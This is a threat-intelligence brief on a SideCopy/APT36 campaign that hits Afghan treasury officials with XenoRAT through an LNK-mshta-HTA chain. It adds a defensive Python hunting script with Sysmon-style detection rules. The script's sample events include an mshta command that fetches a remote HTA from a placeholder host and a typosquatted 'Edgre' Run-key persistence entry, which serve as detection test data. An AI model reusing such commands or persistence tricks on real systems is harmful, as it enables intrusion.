ctipilot.ch


Operation XENOFISCAL: SideCopy (APT36) hits provincial treasury officials with XenoRAT via an mshta/HTA chain

From CTI Daily Brief — 2026-06-03 · published 2026-06-03

Seqrite Labs documented Operation XENOFISCAL, a SideCopy (Transparent Tribe / APT36, Pakistan-attributed) campaign against finance officials across Afghanistan's 34 provincial treasury directorates (Mustoufiats) (Seqrite Labs, 2026-05-29). The chain is the group's long-standing signature — a spear-phishing ZIP carrying a Pashto-language LNK that invokes mshta.exe to pull an obfuscated HTA/JavaScript stage from a compromised education domain, which stages .NET loaders in memory before dropping the publicly available XenoRAT (keylogging, screen capture, remote shell) (The Hacker News, 2026-06-02). Persistence uses a Registry Run key typosquatting Microsoft Edge ("Edgre") plus a Scheduled Task; C2 ran on an EU-hosted bulletproof AS (AS59711) previously tied to the group. ATT&CK: T1566.001, T1218.005 (mshta proxy execution), T1547.001, T1053.005.

Why it matters to us: The victimology is South-Central Asian, but the LNK→mshta.exe→HTA→RAT pattern and the typosquatted-product Run-key persistence are directly transferable hunt content for any public-sector treasury/finance environment. Alert on mshta.exe launched with a URL on its command line or making outbound HTTP (the remote-HTA pull is the first network touch in this chain), on mshta.exe spawning script hosts such as wscript.exe, and on Run-key values whose name or target executable misspells a legitimate Microsoft product name. Caveat: mshta.exe has almost no legitimate use on finance workstations, so blocking it outright with AppLocker or WDAC (it is on Microsoft's recommended block list) is usually cheaper than tuning the alert.
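The hunt content above, turned into runnable logic as an added example (this is not code from Seqrite Labs, The Hacker News, or this brief). It assumes Sysmon-style field names (EventID 1 process creation, 3 network connection, 13 registry value set); the events, domain, IP address, file paths and the product-name list are constructed for the example and are not indicators from the report.

```python
"""
Hunt rules for the LNK -> mshta.exe -> remote HTA -> RAT chain and for
typosquatted-product Run-key persistence, run over constructed Sysmon-style events.
"""
import re
from typing import Iterable

# Legitimate Microsoft product names as they appear in Run-key value names or exe
# stems (lower-case). Exact matches are allowed; 1-2 edit near-misses are flagged.
# Hypothetical allowlist for the example; extend it for your estate.
PRODUCT_NAMES = ("edge", "msedge", "onedrive", "teams", "office", "outlook",
                 "defender", "skype", "cortana")

# Child processes that mshta.exe should never need to start on a finance workstation.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}

URL_RE = re.compile(r"https?://", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\([^\\]+)$", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased ('' for missing fields)."""
    return path.rsplit("\\", 1)[-1].lower()


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; inputs are short, so the O(len*len) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_hits(text: str) -> list[tuple[str, str]]:
    """Alphabetic tokens (4+ chars) that are 1-2 edits from a product name but not the name itself."""
    hits = []
    for tok in re.findall(r"[A-Za-z]{4,}", text):
        low = tok.lower()
        if low in PRODUCT_NAMES:
            continue  # exact product name: legitimate, e.g. 'OneDrive'
        for name in PRODUCT_NAMES:
            if 1 <= edit_distance(low, name) <= 2:
                hits.append((tok, name))  # e.g. ('Edgre', 'edge')
                break
    return hits


def hunt(events: Iterable[dict]) -> list[dict]:
    """Apply the four rules and return one finding per matching event/rule pair."""
    findings = []
    for idx, ev in enumerate(events):
        eid = ev.get("EventID")
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        # T1218.005: mshta.exe handed a URL, i.e. a remote HTA pull
        if eid == 1 and image == "mshta.exe" and URL_RE.search(ev.get("CommandLine", "")):
            findings.append({"event": idx, "rule": "mshta_remote_hta", "attack": "T1218.005"})
        # mshta.exe spawning a script host or shell
        if eid == 1 and parent == "mshta.exe" and image in SCRIPT_HOSTS:
            findings.append({"event": idx, "rule": "mshta_spawns_script_host", "attack": "T1218.005"})
        # mshta.exe initiating an outbound connection
        if eid == 3 and image == "mshta.exe" and str(ev.get("Initiated", "")).lower() == "true":
            findings.append({"event": idx, "rule": "mshta_outbound", "attack": "T1218.005"})
        # T1547.001: Run-key value name or target exe that near-misses a product name
        if eid == 13:
            m = RUN_KEY_RE.search(ev.get("TargetObject", ""))
            if m:
                exe_stem = basename(ev.get("Details", "")).rsplit(".", 1)[0]
                hits = typosquat_hits(m.group(1)) + typosquat_hits(exe_stem)
                if hits:
                    findings.append({"event": idx, "rule": "runkey_product_typosquat",
                                     "attack": "T1547.001", "hits": hits})
    return findings


# Constructed events (Sysmon field names; domain, IP and paths are made up, not report IOCs).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://lure.example.invalid/data/index.hta'},
    {"EventID": 3, "Image": r"C:\Windows\System32\mshta.exe", "Initiated": "true",
     "DestinationIp": "203.0.113.45", "DestinationPort": 443},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\mshta.exe", "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\alice\AppData\Local\Temp\s.js"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Edgre",
     "Details": r"C:\Users\alice\AppData\Roaming\Edgre\updater.exe"},
    # Benign noise that must not fire: a local HTA and the real OneDrive Run value.
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

The typosquat rule deliberately ignores tokens shorter than four characters and exact product names, so the real OneDrive entry is silent while "Edgre" fires against "edge"; expect some noise from product-like vendor names and tune the allowlist rather than the distance.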